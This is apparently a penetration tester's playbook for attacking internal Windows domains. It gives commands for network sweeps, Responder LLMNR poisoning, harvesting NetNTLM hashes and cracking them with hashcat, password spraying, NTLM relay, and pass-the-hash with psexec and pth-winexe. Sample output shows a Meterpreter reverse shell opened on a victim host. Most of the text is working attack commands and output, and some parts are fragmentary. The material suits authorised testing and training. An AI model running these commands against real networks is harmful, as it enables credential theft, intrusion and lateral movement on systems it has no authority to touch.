If no target list is given, try an Nmap ping scan of the private ranges and start Responder.
# Start Responder on the LAN interface (foreground process -- give it its own terminal).
sudo responder -I eth0
# Ping sweep of the three RFC1918 ranges; -n skips reverse DNS.
# Raw nmap output (not just IPs) is appended to Targets.tmp for later filtering.
for range in 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16; do
  nmap -sn -n "$range" | tee -a Targets.tmp
done
# Loud so only use if required
# Same three ranges with masscan at a very high packet rate -- far noisier than the
# ping sweep above, so only when the engagement scope allows it.
for range in 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16; do
  masscan "$range" -p80,445,22 --rate 100000000 | tee -a Targets.tmp
done
#Note down IP addresses from responder
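# Responder needs root to bind its listeners -- run it with sudo as on the first invocation.
sudo responder -I eth0
# Pull the hosts Responder answered (field 11 of the "answer" log lines) into the target list.
# Single awk pass replaces the cat | grep | awk chain; the log file is read directly.
awk '/answer/ {print $11}' /usr/share/responder/logs/Responder-Session.log | sort -u | tee -a Targets.tmp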
#Note current IP address & scan range
# Show the local interface addresses (ifconfig is net-tools; 'ip addr' is the iproute2 equivalent
# on hosts that no longer ship it).
ifconfig
# Quick sweep of the local /24 for the 10 most common ports; -Pn skips host discovery.
nmap -Pn --top-ports 10 10.0.0.1/24 | tee -a Targets.tmp
#netdiscover
# netdiscover on eth0 (see 'netdiscover -h' for what -P selects).
netdiscover -P -i eth0
# NBTScan: NetBIOS name sweep of the local /24.
nbtscan 192.168.1.0/24
Now cat, grep and sort the IP addresses into a file called Targets.txt.
If given a range, do the following:
# Ping sweep of the range, keeping only the IP (field 5 of "Nmap scan report for <ip>");
# one tee appends to both files.
nmap -n -sn 192.168.10.0/24 | grep report | cut -d ' ' -f 5 | tee -a ipaddresses.txt targets.txt
# Same sweep with reverse DNS enabled: field 5 onward keeps "<name> (<ip>)" when a name resolves.
nmap -sn 192.168.10.0/24 | grep report | cut -d ' ' -f 5- | tee -a host-ip.txt
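# Per-host nmap sweep. Run from the directory that holds networkscan/; the host is taken
# from the third '/'-separated field of $1 (HOST in scheme://HOST/...) and everything is
# written under networkscan/HOST/. Uses only POSIX sh constructs.
# Outputs: report-HOST.txt, ports-HOST.txt, services-HOST.txt, nmap-tcp-HOST.txt, nmap-udp-HOST.txt
mkdir -p networkscan
cd networkscan || exit 1
target=$(printf '%s\n' "$1" | cut -d '/' -f 3)
# An argument without '//' yields an empty host; stop here rather than creating (and later
# deleting) directories with an empty name.
: "${target:?usage: $0 scheme://host[/...] (no host found in argument)}"
# Word lists for later manual steps; not used by this script.
userlist=~/jdksec/Payloads/top-usernames-shortlist.txt
passlist=~/jdksec/Payloads/darkweb2017-top100.txt
# Printed via printf '%b' so the \n escapes become real newlines (bash's echo leaves them literal).
line="\n=====================\n"
report="report-$target.txt"
mkdir -p -- "$target"
cd -- "$target" || exit 1
# -p so re-running after a partial scan does not fail here.
mkdir -p nmap-basic nmap-udp
{
  echo "#####################################################################"
  echo "Scan report for $target"
  echo "#####################################################################"
  printf '%b\n' "$line Nmap Scan for $target...$line "
} | tee -a "$report"
# Full TCP port sweep; collapse the open port numbers into nmap's comma-separated -p syntax.
ports=$(nmap -Pn -p- --min-rate=1000 -T4 "$target" | grep '^[0-9]' | cut -d '/' -f 1 | paste -sd ',')
if [ -z "$ports" ]; then
  # Without this guard 'nmap -p "" HOST' would take the host as the port list.
  echo "No open TCP ports found on $target" | tee -a "$report"
else
  printf '## Open Ports:\n\n'
  # Word splitting on the space-separated list is intended here.
  for port in $(printf '%s\n' "$ports" | tr ',' ' '); do
    echo "$target:$port"
  done | tee -a "ports-$target.txt"
  printf '\n\n'
  nmap -Pn -sC -sV -p "$ports" "$target" -oN "nmap-basic/$target"
  cat nmap-basic/* >> "$report"
fi
printf '%b\n' "$line Nmap UDP ...$line " | tee -a "$report"
# UDP scanning needs raw sockets, hence sudo; the -oN file will be root-owned.
sudo nmap -sUVC --open "$target" --top-ports 20 -oN "nmap-udp/$target"
cat nmap-udp/* >> "$report"
# grep from inside each directory (subshell, so no cd back) so -H prefixes each line with
# just the host filename; later steps split these lines on '/' to recover host:port.
(cd nmap-basic && grep -Hari "/tcp" | grep -v ":|") >> "services-$target.txt"
(cd nmap-udp && grep -Hari "/udp" | grep -v filtered) >> "services-$target.txt"
printf '%b\n' "$line Services ...$line " | tee -a "$report"
tee -a "$report" < "services-$target.txt"
printf '%b\n' "$line Ports ...$line " | tee -a "$report"
tee -a "$report" < "ports-$target.txt"
# Keep the per-protocol nmap output as flat files, then drop the scratch directories.
[ -e "nmap-basic/$target" ] && mv -- "nmap-basic/$target" "nmap-tcp-$target.txt"
[ -e "nmap-udp/$target" ] && mv -- "nmap-udp/$target" "nmap-udp-$target.txt"
rm -rf -- nmap-udp nmap-basic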
Gather Webservers
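# Services lines look like "host:port/tcp ..." -- keep host:port, record it, and probe for HTTP(S).
# cut reads the files directly instead of via cat.
cut -d '/' -f 1 networkscan/*/service* | tee -a ports.txt | ~/go/bin/httprobe | tee -a webservers.txt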
Now open each in Firefox and check for default credentials, etc.
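# Open each URL in turn; read -r avoids the word-splitting/globbing of 'for i in $(cat ...)'.
while IFS= read -r url; do
  firefox "$url"
  sleep 1
done < webservers.txt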
Scan with nuclei
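# nuclei reads the URL list from stdin; redirect the file instead of cat-piping it.
~/go/bin/nuclei -nts -nc -silent < webservers.txt | tee -a vulnscan.txt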
Basic Vuln scan quick wins
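# Metasploit check-only (auxiliary/scanner) modules; only lines mentioning "vulnerable" are kept.
# rdphosts.txt / smbhosts.txt are not produced by the steps above and must exist first.
msfconsole -qx "color false;use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set rhosts file://rdphosts.txt; set lhost eth0;run; quit" | grep -i "vulnerable" | tee -a vulnscan.txt
# The ';' after the rhosts setting was missing, so 'set lhost eth0' was swallowed into the rhosts value.
msfconsole -qx "color false;use auxiliary/scanner/smb/smb_ms17_010; set rhosts file://smbhosts.txt; set lhost eth0;run; quit" | grep -i "vulnerable" | tee -a vulnscan.txt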
Check responder for hashes and crack with hashcat
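# Collect the captured NetNTLM hashes from Responder's logs, de-duplicated.
sort -u /usr/share/responder/logs/*NTLM* >> hashes.txt
# sort reads all input before writing, so -o may name the input file; no cat needed.
sort -u -o hashes.txt hashes.txt
hashcat --force -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt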
# Much Slower so use npk if possible or cloud cracker
# Third-party rule file fetched unpinned over HTTPS (no checksum); inspect it before use.
wget https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule
# Same -m 5600 run as above with the rule set applied (much slower than the plain wordlist pass).
hashcat --force -m 5600 -r OneRuleToRuleThemAll.rule hashes.txt /usr/share/wordlists/rockyou.txt
Once you have some hashes, test with several wordlists; if none work, scrape the client's website for words with CeWL.
Then repeat the cracking process with a better password/rule list.
Domain enumeration
Get DC List
# Windows command
nltest /DCLIST:domain.local
# Linux Commands
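# The configured DNS servers are usually the domain controllers.
cat /etc/resolv.conf
# Hosts with Kerberos/LDAP/LDAPS open.
nmap -p 88,389,636 -iL targets.txt --open | tee -a domaincontrollers.txt
# Reverse-lookup each target and keep names containing "dc".
# The original 'for i in (cat Targets.txt)' lacked the '$' (syntax error) and used a
# different capitalisation from the targets.txt read on the line above.
while IFS= read -r ip; do
  nslookup "$ip" | grep "dc"
done < targets.txt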
nslookup
> set type=all
_ldap._tcp.dc._msdcs.DOMAIN
Set a timer for every 30 minutes and rerun this attack.
It may be worth checking the password lockout policy with the client first, especially in a sensitive environment.
msfconsole -q
set rhosts domaincontrollerip
use auxiliary/scanner/smb/smb_login
set SMBDomain domain
set USER_FILE DomainUsers.txt
set SMBPass firstpassword
date << adds a timestamp
run
Find open SMB shares which are available unauthenticated
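# Unauthenticated share listing per target; read -r replaces the word-splitting 'for i in $(cat ...)'.
while IFS= read -r host; do
  smbmap -H "$host"
done < targets.txt | tee -a smbmap-output.txt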
Find open writable shares and search for authenticated file servers:
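# Authenticated share listing per target. Note the credentials are on the command line and
# therefore visible in process listings and shell history.
while IFS= read -r host; do
  smbmap -u 'username' -p 'password' -d 'domain' -H "$host"
done < targets.txt | tee -a SMBMap-Output.txt
leafpad SMBMap-Output.txt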
ctrl + f WRITE (Search for writable folders)
[Responder Core]
; Servers to start
SQL = On
SMB = Off << turn off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off << turn off
HTTPS = On
DNS = On
LDAP = On
If you capture a high-privilege user's account, it will drop the hashes from the system.
Now use psexec within metasploit to login to the target
msfconsole
use exploit/windows/smb/psexec
set lhost 192.168.1.1
set rhost 192.168.1.11
set smbpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
exploit
Sometimes ntlmrelay fails, to fix, run the following
Either will do, once the enumeration has finished upload the csv files to your attacker machine.
Then run
python ntlmrelayx.py -tf smbsigningdisabled.txt
root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
# Where WORKGROUP is the default WORKGROUP. Can be replaced by a domain name
# Administrator: account's name
# aad3b435b51404eeaad3b435b51404ee: Empty LM HASH
# C0F2E311D3F450A7FF2571BB59FBEDE5: NTLM hash
root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows \[Version 6.3.9600\]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
Server\Administrator
msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set SMBPass aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBDomain WORKGROUP
msf exploit(psexec) > run
[*] Started reverse TCP handler on 192.168.1.24:4444
[*] 192.168.1.25:445 - Connecting to the server...
[*] 192.168.1.25:445 - Authenticating to 192.168.1.25:445|WORKGROUP as user 'administrator'...
[*] 192.168.1.25:445 - Selecting PowerShell target
[*] 192.168.1.25:445 - Executing the payload...
[+] 192.168.1.25:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957999 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.24:4444 -> 192.168.1.25:49173) at 2017-04-05 22:48:15 +0200
meterpreter > exit
This will output the local hashes if you capture a domain admins NTLM hash.
Once you have this hash, login to the machine with metasploits psexec pass the hash or psexec.py
Bloodhound
Once on the domain as a windows user run the following: